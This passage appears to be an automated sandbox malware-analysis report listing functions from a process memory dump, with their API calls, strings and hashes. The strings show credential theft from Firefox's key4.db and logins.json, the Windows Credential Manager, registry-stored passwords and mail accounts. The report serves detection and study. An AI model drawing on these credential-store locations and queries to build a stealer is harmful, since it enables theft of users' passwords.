                      Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                      • API String ID: 231171946-2189169393
                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                      Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscat$memsetsprintf$_mbscpy
                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                      • API String ID: 633282248-1996832678
                      • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                      • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                      Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                      • , xrefs: 00406834
                      • key4.db, xrefs: 00406756
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memcmp$memsetstrlen
                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                      • API String ID: 3614188050-3983245814
                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                      Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                      • API String ID: 710961058-601624466
                      • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                      • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                      • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                      • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                      Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: sprintf$memset$_mbscpy
                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                      • API String ID: 3402215030-3842416460
                      • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                      • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                      Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                        • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                        • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                        • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                        • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                      • strlen.MSVCRT ref: 0040F139
                      • strlen.MSVCRT ref: 0040F147
                      • memset.MSVCRT ref: 0040F187
                      • strlen.MSVCRT ref: 0040F196
                      • strlen.MSVCRT ref: 0040F1A4
                      • memset.MSVCRT ref: 0040F1EA
                      • strlen.MSVCRT ref: 0040F1F9
                      • strlen.MSVCRT ref: 0040F207
                      • _strcmpi.MSVCRT ref: 0040F2B2
                      • _mbscpy.MSVCRT ref: 0040F2CD
                      • _mbscpy.MSVCRT ref: 0040F30E
                        • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                      • String ID: logins.json$none$signons.sqlite$signons.txt
                      • API String ID: 1613542760-3138536805
                      • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                      • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                      Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                      • API String ID: 1012775001-1343505058
                      • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                      • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                      Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00444612
                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                      • strlen.MSVCRT ref: 0044462E
                      • memset.MSVCRT ref: 00444668
                      • memset.MSVCRT ref: 0044467C
                      • memset.MSVCRT ref: 00444690
                      • memset.MSVCRT ref: 004446B6
                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                        • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                      • memcpy.MSVCRT ref: 004446ED
                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                      • memcpy.MSVCRT ref: 00444729
                      • memcpy.MSVCRT ref: 0044473B
                      • _mbscpy.MSVCRT ref: 00444812
                      • memcpy.MSVCRT ref: 00444843
                      • memcpy.MSVCRT ref: 00444855
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset$strlen$_mbscpy
                      • String ID: salu
                      • API String ID: 3691931180-4177317985
                      • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                      • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                      Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Library$FreeLoad
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                      • API String ID: 2449869053-232097475
                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                      Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                      Download Yara Rule
                      APIs
                      • sprintf.MSVCRT ref: 0040957B
                      • LoadMenuA.USER32(?,?), ref: 00409589
                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                      • DestroyMenu.USER32(00000000), ref: 004095A7
                      • sprintf.MSVCRT ref: 004095EB
                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                      • memset.MSVCRT ref: 0040961C
                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                      • DestroyWindow.USER32(00000000), ref: 0040965C
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                      • String ID: caption$dialog_%d$menu_%d
                      • API String ID: 3259144588-3822380221
                      • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                      • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                      Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Library$FreeLoad
                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                      • API String ID: 2449869053-4258758744
                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                      Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                      • memset.MSVCRT ref: 0040F84A
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                      • LocalFree.KERNEL32(?), ref: 0040F92C
                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                      • String ID: Creds$ps:password
                      • API String ID: 551151806-1872227768
                      • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                      • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                      Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                      Download Yara Rule
                      APIs
                      • wcsstr.MSVCRT ref: 0040426A
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                      • _mbscpy.MSVCRT ref: 004042D5
                      • _mbscpy.MSVCRT ref: 004042E8
                      • strchr.MSVCRT ref: 004042F6
                      • strlen.MSVCRT ref: 0040430A
                      • sprintf.MSVCRT ref: 0040432B
                      • strchr.MSVCRT ref: 0040433C
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                      • String ID: %s@gmail.com$www.google.com
                      • API String ID: 3866421160-4070641962
                      • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                      • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                      Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                      • _mbscpy.MSVCRT ref: 00409749
                      • _mbscpy.MSVCRT ref: 00409759
                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                      • _mbscpy.MSVCRT ref: 004097A1
                      • memset.MSVCRT ref: 004097BD
                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                      • String ID: TranslatorName$TranslatorURL$general$strings
                      • API String ID: 1035899707-3647959541
                      • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                      • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                      Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                      • API String ID: 2360744853-2229823034
                      • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                      • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                      Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                      Download Yara Rule
                      APIs
                      • strchr.MSVCRT ref: 004100E4
                      • _mbscpy.MSVCRT ref: 004100F2
                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                      • _mbscpy.MSVCRT ref: 00410142
                      • _mbscat.MSVCRT ref: 0041014D
                      • memset.MSVCRT ref: 00410129
                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                        • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                      • memset.MSVCRT ref: 00410171
                      • memcpy.MSVCRT ref: 0041018C
                      • _mbscat.MSVCRT ref: 00410197
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                      • String ID: \systemroot
                      • API String ID: 912701516-1821301763
                      • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                      • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                      Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$strlen
                      • String ID: -journal$-wal$immutable$nolock
                      • API String ID: 2619041689-3408036318
                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                      Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      • wcslen.MSVCRT ref: 0040874A
                      • _wcsncoll.MSVCRT ref: 00408794
                      • memset.MSVCRT ref: 0040882A
                      • memcpy.MSVCRT ref: 00408849
                      • wcschr.MSVCRT ref: 0040889F
                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                      • String ID: J$Microsoft_WinInet
                      • API String ID: 2203907242-260894208
                      • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                      • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                      Function 004108E5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                      Download Yara Rule
                      APIs
                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                      • memcpy.MSVCRT ref: 00410961
                      Strings
                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FromStringUuid$memcpy
                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                      • API String ID: 2859077140-2022683286
                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
